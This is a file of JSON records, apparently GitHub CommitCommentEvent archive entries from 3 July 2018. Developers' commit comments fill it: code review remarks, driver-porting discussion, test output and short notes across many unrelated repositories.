{"id":"7914579848","type":"CommitCommentEvent","actor":{"login":"AArnott"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29586007,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-03T19:29:42Z","updated_at":"2018-07-03T19:29:42Z","author_association":"OWNER","body":"Thanks. Is there an internal bug tracking this root cause already? (would you mind sharing it?)\r\n\r\nIf this property is being set in a .targets file, clearing it in the project file wouldn't work unless I give up using the Project/@Sdk attribute so I can clear the property after the .targets import.\r\n\r\nDo you see any downside to the workaround I'm using here (in this commit)?"}},"created_at":"2018-07-03T19:29:42Z"}
{"id":"7914580560","type":"CommitCommentEvent","actor":{"login":"SpaceC00kies"},"repo":{"name":"SpaceC00kies/experiment"},"payload":{"comment":{"id":29586009,"position":null,"line":null,"path":null,"commit_id":"3a87371b4b7dd1cd42cb1a66957053c8a5f7e28b","created_at":"2018-07-03T19:29:51Z","updated_at":"2018-07-03T19:29:51Z","author_association":"OWNER","body":"fix image "}},"created_at":"2018-07-03T19:29:51Z"}
{"id":"7914580800","type":"CommitCommentEvent","actor":{"login":"jeena"},"repo":{"name":"jeena/esp8266-button"},"payload":{"comment":{"id":29586010,"position":2,"line":1,"path":"hardware/kicad/esp8266-button.pro","commit_id":"af4c72675b59c5860c130f845da056bd1c8595cf","created_at":"2018-07-03T19:29:54Z","updated_at":"2018-07-03T19:29:54Z","author_association":"OWNER","body":"Haha, yeah this is weird."}},"created_at":"2018-07-03T19:29:54Z"}
{"id":"7914581309","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29586012,"position":90,"line":206,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/dashboard_page.tsx","commit_id":"9f1953ec9eb76cdeea521cdb94c550141a24211b","created_at":"2018-07-03T19:30:02Z","updated_at":"2018-07-03T19:30:02Z","author_association":"COLLABORATOR","body":"Double indent line 206 so that it's like:\r\n\r\nclass DashboardBurgerButton extends\r\n    React.Component<...>"}},"created_at":"2018-07-03T19:30:02Z"}
{"id":"7914581582","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29586015,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T19:30:07Z","updated_at":"2018-07-03T19:30:07Z","author_association":"OWNER","body":"For the PDM_ODM_T, they removed the define/typedef.... all references to PDM_ODM_T should be replaced by \"struct PHY_DM_STRUCT*\"\r\nYes, it was a pain in the ass doing a 3 way diff (original rtl branch, new rtl branch, my branch) this way you can see what were the realtek modifications and you will discover that 95% of the modifications are just cosmetics (function rename, parameters renaming, struct renaming, Case renaming etc)... thanks realtek!"}},"created_at":"2018-07-03T19:30:07Z"}
{"id":"7914589234","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29586028,"position":56,"line":78,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/side_menu.tsx","commit_id":"9f1953ec9eb76cdeea521cdb94c550141a24211b","created_at":"2018-07-03T19:31:45Z","updated_at":"2018-07-03T19:31:45Z","author_association":"COLLABORATOR","body":"Place a blank line before this class declaration."}},"created_at":"2018-07-03T19:31:45Z"}
{"id":"7914590666","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29586032,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T19:32:05Z","updated_at":"2018-07-03T19:32:05Z","author_association":"NONE","body":"Oooooh yes I've seen their work, it makes it HARD to port functions from other forks/brans\r\nSo the file I need to look at is in the phydm_adaptivity.c, got it. Im into it right now."}},"created_at":"2018-07-03T19:32:05Z"}
{"id":"7914590683","type":"CommitCommentEvent","actor":{"login":"JSurigao"},"repo":{"name":"bppwrite/bppwrite.github.io"},"payload":{"comment":{"id":29586033,"position":22,"line":22,"path":"content/event/2018-2019/vintage-songs/index.md","commit_id":"056a1fc1e047a332a8d650ae3bea9c1debc2ee64","created_at":"2018-07-03T19:32:05Z","updated_at":"2018-07-03T19:32:05Z","author_association":"CONTRIBUTOR","body":"@marcguyer Yes, eventually. When I know what the event will be. This can be deleted. "}},"created_at":"2018-07-03T19:32:05Z"}
{"id":"7914590992","type":"CommitCommentEvent","actor":{"login":"cyberjoac"},"repo":{"name":"jenkinsci/dingding-notifications-plugin"},"payload":{"comment":{"id":29586035,"position":null,"line":null,"path":null,"commit_id":"4636984acdfc15d1110e12aa43f41387ddcc8015","created_at":"2018-07-03T19:32:09Z","updated_at":"2018-07-03T19:32:09Z","author_association":"NONE","body":"Hi, how to use the Dingtalk notification in a Jenkins pipeline ? \r\nThanks ! "}},"created_at":"2018-07-03T19:32:09Z"}
{"id":"7914591464","type":"CommitCommentEvent","actor":{"login":"Onyedikareal"},"repo":{"name":"Onyedikareal/Andela7daysOfCoding"},"payload":{"comment":{"id":29586039,"position":null,"line":null,"path":null,"commit_id":"cdfd271c221389a6245821024916288cb45014ba","created_at":"2018-07-03T19:32:14Z","updated_at":"2018-07-03T19:32:14Z","author_association":"OWNER","body":"change of cache index"}},"created_at":"2018-07-03T19:32:14Z"}
{"id":"7914591512","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29586040,"position":null,"line":null,"path":null,"commit_id":"3b48982cc6237584523f8e2e505f4d3d939fbff8","created_at":"2018-07-03T19:32:15Z","updated_at":"2018-07-03T19:32:15Z","author_association":"COLLABORATOR","body":"Scott ... this aint right. The set value change looks ok but the range change on the slider does not look right. It is meant to allow zoom in or out ... so range should go down to zero."}},"created_at":"2018-07-03T19:32:15Z"}
{"id":"7914593350","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29586044,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T19:32:39Z","updated_at":"2018-07-03T19:32:39Z","author_association":"OWNER","body":"carrefull also with puBytes, replaced by \"u8*\" (don't miss the * ;) )"}},"created_at":"2018-07-03T19:32:39Z"}
{"id":"7914593718","type":"CommitCommentEvent","actor":{"login":"blakeembrey"},"repo":{"name":"TypeStrong/ts-node"},"payload":{"comment":{"id":29586045,"position":null,"line":null,"path":null,"commit_id":"33cb1b5faecaa652b70fe97cb3665de7d42565c2","created_at":"2018-07-03T19:32:44Z","updated_at":"2018-07-03T19:32:44Z","author_association":"MEMBER","body":"Use paths or types. It’s mentioned in the README. This was the change recommended by TypeScript and agreed with it, the fact that your definitions previously worked and don’t now is the reason it was a major release."}},"created_at":"2018-07-03T19:32:44Z"}
{"id":"7914594228","type":"CommitCommentEvent","actor":{"login":"steviebanko"},"repo":{"name":"steviebanko/Phantom"},"payload":{"comment":{"id":29586046,"position":5,"line":243,"path":"index.html","commit_id":"ad1696b60bbe8970afa0517c3fcfdb2320d93d2f","created_at":"2018-07-03T19:32:52Z","updated_at":"2018-07-03T19:32:52Z","author_association":"OWNER","body":"lightbox makes items clickable"}},"created_at":"2018-07-03T19:32:52Z"}
{"id":"7914594347","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29586047,"position":null,"line":null,"path":null,"commit_id":"8627a38c01c5824c36d48b9df9b4b91c9f582d6d","created_at":"2018-07-03T19:32:54Z","updated_at":"2018-07-03T19:32:54Z","author_association":"COLLABORATOR","body":"Looks good to me."}},"created_at":"2018-07-03T19:32:54Z"}
{"id":"7914595705","type":"CommitCommentEvent","actor":{"login":"meetubh"},"repo":{"name":"meetubh/rs-online"},"payload":{"comment":{"id":29586049,"position":null,"line":null,"path":null,"commit_id":"865b46b464f9cf31cced646a950a502af9e92e54","created_at":"2018-07-03T19:33:12Z","updated_at":"2018-07-03T19:33:12Z","author_association":"OWNER","body":"[Epenses, Losses and Interest Refund Calculator - With Tax Adjustment.xlsx](https://github.com/meetubh/rs-online/files/2160768/Epenses.Losses.and.Interest.Refund.Calculator.-.With.Tax.Adjustment.xlsx)\r\n"}},"created_at":"2018-07-03T19:33:12Z"}
{"id":"7914596198","type":"CommitCommentEvent","actor":{"login":"cory2067"},"repo":{"name":"jynnie/accountability"},"payload":{"comment":{"id":29586052,"position":null,"line":null,"path":null,"commit_id":"29d1c7c8e7db016a7e76a4a95fd4e9901addc31f","created_at":"2018-07-03T19:33:19Z","updated_at":"2018-07-03T19:33:19Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/8433005/42240749-261b1240-7ebd-11e8-945b-25260dae7176.png)\r\nhey i finished level 2 100x faster than i finished level 1\r\nat this acceleration, i'll be level 60 in no time"}},"created_at":"2018-07-03T19:33:19Z"}
{"id":"7914596580","type":"CommitCommentEvent","actor":{"login":"meetubh"},"repo":{"name":"meetubh/rs-online"},"payload":{"comment":{"id":29586054,"position":null,"line":null,"path":null,"commit_id":"865b46b464f9cf31cced646a950a502af9e92e54","created_at":"2018-07-03T19:33:25Z","updated_at":"2018-07-03T19:33:25Z","author_association":"OWNER","body":"Calculator"}},"created_at":"2018-07-03T19:33:25Z"}
{"id":"7914597450","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29586055,"position":4,"line":1996,"path":"src/CodeGen_Hexagon.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-03T19:33:38Z","updated_at":"2018-07-03T19:33:38Z","author_association":"NONE","body":"there is no need for 64b (overkill for current generation); hexagon is a 32b architecture"}},"created_at":"2018-07-03T19:33:38Z"}
{"id":"7914599449","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":29586057,"position":14,"line":50,"path":"R/render.R","commit_id":"a18c447a74be338ca520afab77cab72d224ec3ff","created_at":"2018-07-03T19:34:08Z","updated_at":"2018-07-03T19:34:08Z","author_association":"MEMBER","body":"Okay, thanks!"}},"created_at":"2018-07-03T19:34:08Z"}
{"id":"7914602418","type":"CommitCommentEvent","actor":{"login":"keithsw1111"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":29586063,"position":null,"line":null,"path":null,"commit_id":"3b48982cc6237584523f8e2e505f4d3d939fbff8","created_at":"2018-07-03T19:34:47Z","updated_at":"2018-07-03T19:34:47Z","author_association":"COLLABORATOR","body":"Actually no ... even the set value looks odd compared to the code around it."}},"created_at":"2018-07-03T19:34:47Z"}
{"id":"7914602904","type":"CommitCommentEvent","actor":{"login":"ananthr1"},"repo":{"name":"ananthr1/Anatomy-and-Physiology"},"payload":{"comment":{"id":29586065,"position":null,"line":null,"path":null,"commit_id":"6067ccb1966a4bd71cd60b8405e9e1f78a76c417","created_at":"2018-07-03T19:34:54Z","updated_at":"2018-07-03T19:34:54Z","author_association":"OWNER","body":"**Video Review 07-03-2018**\r\n\r\n“The Nervous System, part 1: Crash Course A&P #8”:"}},"created_at":"2018-07-03T19:34:54Z"}
{"id":"7914604334","type":"CommitCommentEvent","actor":{"login":"polie94"},"repo":{"name":"polie94/ORBSLAM"},"payload":{"comment":{"id":29586068,"position":64,"line":64,"path":"System.h","commit_id":"24bbc425712b85e959baacb1dae8a5be29c1aca6","created_at":"2018-07-03T19:35:14Z","updated_at":"2018-07-03T19:35:14Z","author_association":"OWNER","body":"funkcja pobierająca pozycje z ROS do system\r\n"}},"created_at":"2018-07-03T19:35:14Z"}
{"id":"7914604852","type":"CommitCommentEvent","actor":{"login":"orsinium"},"repo":{"name":"orsinium/notes"},"payload":{"comment":{"id":29586070,"position":null,"line":null,"path":null,"commit_id":"f2eb6ef1b5db2743ed7bf4d1120426450eadc4a1","created_at":"2018-07-03T19:35:21Z","updated_at":"2018-07-03T19:35:21Z","author_association":"OWNER","body":"Да, есть такая проблема. Видел где-то улучшенную админку для Django с такими вот фичами. Надо найти и испытать. На практике использовал первый подход. Или просто выпиливал поле) За ссылочку спасибо, выглядит полезно."}},"created_at":"2018-07-03T19:35:21Z"}
{"id":"7914605288","type":"CommitCommentEvent","actor":{"login":"zukululu"},"repo":{"name":"zukululu/randomQuoteGenerator"},"payload":{"comment":{"id":29586071,"position":null,"line":null,"path":null,"commit_id":"746fc15ab76d6700215208ee382becf97687ed54","created_at":"2018-07-03T19:35:26Z","updated_at":"2018-07-03T19:35:26Z","author_association":"OWNER","body":"7/3: Adjusted to interpolation."}},"created_at":"2018-07-03T19:35:26Z"}
{"id":"7914610414","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29586077,"position":15,"line":654,"path":"src/LLVM_Runtime_Linker.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-03T19:36:31Z","updated_at":"2018-07-03T19:36:31Z","author_association":"NONE","body":"are these still needed, given LockedCache is specific to Hexagon, or will it still work for non-hexagon with default to malloc()?"}},"created_at":"2018-07-03T19:36:31Z"}
{"id":"7914611241","type":"CommitCommentEvent","actor":{"login":"polie94"},"repo":{"name":"polie94/ORBSLAM"},"payload":{"comment":{"id":29586079,"position":128,"line":128,"path":"System.cc","commit_id":"24bbc425712b85e959baacb1dae8a5be29c1aca6","created_at":"2018-07-03T19:36:42Z","updated_at":"2018-07-03T19:36:42Z","author_association":"OWNER","body":"Definicja funkcji w celu sprawdzenia, czy pozycja przechodzi pomiędzy klasami. Wynik zapisany do pliku .txt"}},"created_at":"2018-07-03T19:36:42Z"}
{"id":"7914613533","type":"CommitCommentEvent","actor":{"login":"polie94"},"repo":{"name":"polie94/ORBSLAM"},"payload":{"comment":{"id":29586084,"position":124,"line":124,"path":"System.cc","commit_id":"24bbc425712b85e959baacb1dae8a5be29c1aca6","created_at":"2018-07-03T19:37:14Z","updated_at":"2018-07-03T19:37:14Z","author_association":"OWNER","body":"Definicja funkcji w celu sprawdzenia, czy pozycja przechodzi pomiędzy klasami. Wynik zapisany do pliku .txt\r\n"}},"created_at":"2018-07-03T19:37:14Z"}
{"id":"7914614443","type":"CommitCommentEvent","actor":{"login":"FreedomFighterSparrow"},"repo":{"name":"kolzchut/mediawiki-extensions-Discovery"},"payload":{"comment":{"id":29586088,"position":null,"line":null,"path":null,"commit_id":"c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9","created_at":"2018-07-03T19:37:27Z","updated_at":"2018-07-03T19:37:27Z","author_association":"MEMBER","body":"I can change SVG colors if you need a faster response :-)\n\nOn 3 July 2018 at 17:29, Tal Koren <notifications@github.com> wrote:\n\n> Currently waiting for new SVG icons from Moshe; the current ones are black\n> and we need blue.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kolzchut/mediawiki-extensions-Discovery/commit/c17a7f197434f28b9911aa8c1b2c3ebdf1d2f9a9#commitcomment-29581942>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADQgKzbO9ORFWMHs6LLgMMs9Xjq_PgE0ks5uC3-_gaJpZM4VBEDc>\n> .\n>\n"}},"created_at":"2018-07-03T19:37:27Z"}
{"id":"7914615267","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29586091,"position":1,"line":1,"path":"src/runtime/default_cache_allocator.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-03T19:37:39Z","updated_at":"2018-07-03T19:37:39Z","author_association":"NONE","body":"need to understand the purpose for the default...."}},"created_at":"2018-07-03T19:37:39Z"}
{"id":"7914616151","type":"CommitCommentEvent","actor":{"login":"ananthr1"},"repo":{"name":"ananthr1/Printernet"},"payload":{"comment":{"id":29586094,"position":null,"line":null,"path":null,"commit_id":"f3732063d4b1e070edcb9f257fdf57dffcfe37c4","created_at":"2018-07-03T19:37:51Z","updated_at":"2018-07-03T19:37:51Z","author_association":"OWNER","body":" Story Malawi\r\nJuly 3, 2018\r\nJonas Chabroka Fadweck\r\n\r\n**PRINTERNET FIRST BORN IN MALAWI**\r\nHOW PRINTERNET BORN IN MALAWI\r\nReported by:\r\nJonas Fadweck\r\n[https://www.facebook.com/groups/146359786049198/permalink/188935058458337/](url)"}},"created_at":"2018-07-03T19:37:51Z"}
{"id":"7914616270","type":"CommitCommentEvent","actor":{"login":"MH7A"},"repo":{"name":"MH7A/Mh7"},"payload":{"comment":{"id":29586096,"position":1,"line":1,"path":"README.md","commit_id":"ff6926c2f942569275c067203bff10fe59fcf79f","created_at":"2018-07-03T19:37:53Z","updated_at":"2018-07-03T19:37:53Z","author_association":"OWNER","body":"whats our project about"}},"created_at":"2018-07-03T19:37:53Z"}
{"id":"7914617675","type":"CommitCommentEvent","actor":{"login":"joeythesaint"},"repo":{"name":"joeythesaint/rtv"},"payload":{"comment":{"id":29586099,"position":null,"line":null,"path":null,"commit_id":"3fd389c5c2a698359cb97dfecc7aa84e2220b589","created_at":"2018-07-03T19:38:13Z","updated_at":"2018-07-03T19:38:13Z","author_association":"OWNER","body":"```\r\n/home/jjm/...opment/rtv master$ python -m pytest $PWD/tests/      \r\n========================================================================== test session starts ==========================================================================\r\nplatform linux2 -- Python 2.7.15rc1, pytest-3.6.2, py-1.5.4, pluggy-0.6.0\r\nrootdir: /home/jjm/development/rtv, inifile:\r\ncollected 278 items                                                                                                                                                     \r\n\r\ntests/test_clipboard.py .                                                                                                                                         [  0%]\r\ntests/test_config.py ..........                                                                                                                                   [  3%]\r\ntests/test_content.py ..s..........................................................................                                                               [ 31%]\r\ntests/test_mime_parsers.py .............x...................                                                                                                      [ 43%]\r\ntests/test_oauth.py ...........                                                                                                                                   [ 47%]\r\ntests/test_objects.py .............................x.                                                                                                             [ 58%]\r\ntests/test_packages.py .                                                                                                                                          [ 58%]\r\ntests/test_page.py ....                                                                                                                                           [ 60%]\r\ntests/test_submission.py .......................s.                                                                                                                [ 69%]\r\ntests/test_subreddit.py .................s......                                                                                                                  [ 78%]\r\ntests/test_subscription.py .......                                                                                                                                [ 80%]\r\ntests/test_terminal.py .................................                                                                                                          [ 92%]\r\ntests/test_theme.py .....................                                                                                                                         [100%]\r\n\r\n========================================================== 273 passed, 3 skipped, 2 xfailed in 113.90 seconds ===========================================================\r\n```\r\n\r\nI'm not sure what the xfailed message means from the tests above, expected failures?"}},"created_at":"2018-07-03T19:38:13Z"}
{"id":"7914617985","type":"CommitCommentEvent","actor":{"login":"Anipik"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29586101,"position":61,"line":303,"path":"src/System.Runtime.Extensions/src/System/AppDomain.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:38:17Z","updated_at":"2018-07-03T19:38:17Z","author_association":"MEMBER","body":"```\r\nVolatile.Write(ref s_getUnauthenticatedPrincipal, (Func<IPrincipal>)Delegate.CreateDelegate(typeof(Func<IPrincipal>), type, \"GetDefaultInstance\"));\r\n```\r\n\r\nThis fails with \r\n\r\n```\r\n Cannot bind to the target method because its signature or security transparency is not compatible with that of the delegate type\r\n```\r\nthis works\r\n```\r\nMethodInfo mi = type.GetMethod(\"GetDefaultInstance\", BindingFlags.Public | BindingFlags.Instance);\r\nVolatile.Write(ref s_getUnauthenticatedPrincipal, (Func<IPrincipal>)Delegate.CreateDelegate(typeof(Func<IPrincipal>), null, mi));\r\n```"}},"created_at":"2018-07-03T19:38:17Z"}
{"id":"7914620585","type":"CommitCommentEvent","actor":{"login":"LKNX"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":29586106,"position":null,"line":null,"path":null,"commit_id":"ecb2a90e9e2268e40916eb5bc57fde07aade5260","created_at":"2018-07-03T19:38:55Z","updated_at":"2018-07-03T19:38:55Z","author_association":"NONE","body":"Thank you for these quick changes."}},"created_at":"2018-07-03T19:38:55Z"}
{"id":"7914621538","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29586110,"position":30,"line":22,"path":"src/index.js","commit_id":"0f076a981c53a52efce476258d4a0e69426eea51","created_at":"2018-07-03T19:39:08Z","updated_at":"2018-07-03T19:39:08Z","author_association":"OWNER","body":"thank you :D\nbut I don't quite get \" Setting the state once (as apposed to 2 twice, once\nfor every prop) is better.\nThis will prevent unnecessary renders - good job.\" I don't think i did that\non purpose haha\n\nOn Tue, Jul 3, 2018 at 8:10 PM, Hideya Swider <notifications@github.com>\nwrote:\n\n> Good job using the shorthand list as apposed to list: list.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ImenBenA/Tasks/commit/0f076a981c53a52efce476258d4a0e69426eea51#commitcomment-29585803>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Aihdtt0_MwJdqRrgSRYpOJT2KeFA5Mesks5uC8GrgaJpZM4VBe2q>\n> .\n>\n"}},"created_at":"2018-07-03T19:39:08Z"}
{"id":"7914621743","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29586111,"position":72,"line":60,"path":"src/runtime/hexagon_cache_allocator.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-03T19:39:12Z","updated_at":"2018-07-03T19:39:12Z","author_association":"NONE","body":"this is not the right scope for this"}},"created_at":"2018-07-03T19:39:12Z"}
{"id":"7914623070","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29586113,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T19:39:32Z","updated_at":"2018-07-03T19:39:32Z","author_association":"NONE","body":"Running the VLTC test is quite a waste of ressources (as was the LTC), since even if this passes I will not commit the patch :-)"}},"created_at":"2018-07-03T19:39:32Z"}
{"id":"7914630416","type":"CommitCommentEvent","actor":{"login":"thomas-hervey"},"repo":{"name":"openstreetmap/iD"},"payload":{"comment":{"id":29586127,"position":42,"line":435,"path":"modules/modes/select.js","commit_id":"8121f585d59aa7758280e0cc3c4a49d233f2653f","created_at":"2018-07-03T19:41:12Z","updated_at":"2018-07-03T19:41:12Z","author_association":"COLLABORATOR","body":"check to see if incoming is a note. If so, call `sidebar.show`"}},"created_at":"2018-07-03T19:41:12Z"}
{"id":"7914632547","type":"CommitCommentEvent","actor":{"login":"thomas-hervey"},"repo":{"name":"openstreetmap/iD"},"payload":{"comment":{"id":29586132,"position":56,"line":446,"path":"modules/modes/select.js","commit_id":"8121f585d59aa7758280e0cc3c4a49d233f2653f","created_at":"2018-07-03T19:41:41Z","updated_at":"2018-07-03T19:41:41Z","author_association":"COLLABORATOR","body":"the following look like updates because they're pushed to an `else` block. This should probably be changed."}},"created_at":"2018-07-03T19:41:41Z"}
{"id":"7914633995","type":"CommitCommentEvent","actor":{"login":"GeorgeGnzalz2905"},"repo":{"name":"GeorgeGnzalz2905/clase20_06"},"payload":{"comment":{"id":29586137,"position":null,"line":null,"path":null,"commit_id":"69c1869b31421f4c6e54edc6d1bdb06008e72f16","created_at":"2018-07-03T19:42:01Z","updated_at":"2018-07-03T19:42:01Z","author_association":"OWNER","body":"estaba probando las conexiones de netbeans a github desde el S.O deepin "}},"created_at":"2018-07-03T19:42:01Z"}
{"id":"7914636679","type":"CommitCommentEvent","actor":{"login":"javascriptkitty"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29586141,"position":null,"line":null,"path":null,"commit_id":"b800ad3510621558d0e82213a1e6d7923581c327","created_at":"2018-07-03T19:42:38Z","updated_at":"2018-07-03T19:42:38Z","author_association":"OWNER","body":"encrypt function returns \"ebiilhfqqv\" instead of \"ebiil hfqqv\". how to add a space in an array?\r\n"}},"created_at":"2018-07-03T19:42:38Z"}
{"id":"7914638182","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586150,"position":1,"line":1,"path":"client/call-taker/src/App.css","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:43:02Z","updated_at":"2018-07-03T19:43:02Z","author_association":"NONE","body":"Use sass instead of regular css"}},"created_at":"2018-07-03T19:43:02Z"}
{"id":"7914642061","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29586159,"position":205,"line":154,"path":"src/runtime/hexagon_cache_allocator.cpp","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-03T19:43:56Z","updated_at":"2018-07-03T19:43:56Z","author_association":"NONE","body":"see previous comment on size addition"}},"created_at":"2018-07-03T19:43:56Z"}
{"id":"7914642230","type":"CommitCommentEvent","actor":{"login":"amarzavery"},"repo":{"name":"amqp/rhea"},"payload":{"comment":{"id":29586160,"position":21,"line":478,"path":"lib/connection.js","commit_id":"c68e96a98390effcac787d0aefd26bbbddc67589","created_at":"2018-07-03T19:43:58Z","updated_at":"2018-07-03T19:43:58Z","author_association":"COLLABORATOR","body":"You may want to update the type definitions as well for the connection class."}},"created_at":"2018-07-03T19:43:58Z"}
{"id":"7914644348","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586162,"position":6,"line":6,"path":"client/call-taker/src/App.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:44:25Z","updated_at":"2018-07-03T19:44:25Z","author_association":"NONE","body":"When a container does not have state, is better to use a stateless component"}},"created_at":"2018-07-03T19:44:25Z"}
{"id":"7914645274","type":"CommitCommentEvent","actor":{"login":"Jazun713"},"repo":{"name":"elizabeth0719/Enterprise2TowersWatson"},"payload":{"comment":{"id":29586163,"position":66,"line":66,"path":"Desktop/TowersWatson/Directories.py","commit_id":"22dfcba11503b304322864b34900785ad92a37da","created_at":"2018-07-03T19:44:38Z","updated_at":"2018-07-03T19:44:38Z","author_association":"NONE","body":"Leave out user input.  Ingest will be a script or method."}},"created_at":"2018-07-03T19:44:38Z"}
{"id":"7914645721","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586165,"position":5,"line":5,"path":"client/call-taker/src/App.test.js","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:44:45Z","updated_at":"2018-07-03T19:44:45Z","author_association":"NONE","body":"Very good! "}},"created_at":"2018-07-03T19:44:45Z"}
{"id":"7914647899","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29586170,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T19:45:13Z","updated_at":"2018-07-03T19:45:13Z","author_association":"NONE","body":"I really have trouble understanding this one, do you have the time to fork it and make a PR ?\r\nwould be the most wonderful thing this year, as the driver is going into Kali Linux this would really be helpfull"}},"created_at":"2018-07-03T19:45:13Z"}
{"id":"7914648205","type":"CommitCommentEvent","actor":{"login":"aoviedob"},"repo":{"name":"lauchaves/CallTaker"},"payload":{"comment":{"id":29586174,"position":1,"line":1,"path":"client/call-taker/src/index.css","commit_id":"4e4a3fc3595b688af9ed1a44e7a080dd687a2458","created_at":"2018-07-03T19:45:17Z","updated_at":"2018-07-03T19:45:17Z","author_association":"NONE","body":"Use sass"}},"created_at":"2018-07-03T19:45:17Z"}
{"id":"7914649668","type":"CommitCommentEvent","actor":{"login":"Jazun713"},"repo":{"name":"elizabeth0719/Enterprise2TowersWatson"},"payload":{"comment":{"id":29586176,"position":75,"line":75,"path":"Desktop/TowersWatson/Directories.py","commit_id":"22dfcba11503b304322864b34900785ad92a37da","created_at":"2018-07-03T19:45:36Z","updated_at":"2018-07-03T19:45:36Z","author_association":"NONE","body":"call treesize with just toproot or root file path.  Return alldirs allfiles counts if you need from the function call.  Access them as iterables such as totsize, alldirs, allfiles, counts = treesize(...)"}},"created_at":"2018-07-03T19:45:36Z"}
{"id":"7914649793","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29586177,"position":61,"line":303,"path":"src/System.Runtime.Extensions/src/System/AppDomain.cs","commit_id":"1afef02f82e4091a29ccd53d8e31bca1360b7005","created_at":"2018-07-03T19:45:38Z","updated_at":"2018-07-03T19:45:38Z","author_association":"MEMBER","body":"We should not have any security transparency annotations in .NET Core. It is very odd the you are getting the error about security transparency. It would be nice to figure out what is causing it."}},"created_at":"2018-07-03T19:45:38Z"}
{"id":"7914649829","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29586178,"position":6,"line":149,"path":"src/runtime/runtime_internal.h","commit_id":"3943a5138c6d8643c07567365355f0eb6be75fc0","created_at":"2018-07-03T19:45:38Z","updated_at":"2018-07-03T19:45:38Z","author_association":"NONE","body":"still not clear the need for these here, given its only called by hexagon_runtime"}},"created_at":"2018-07-03T19:45:38Z"}
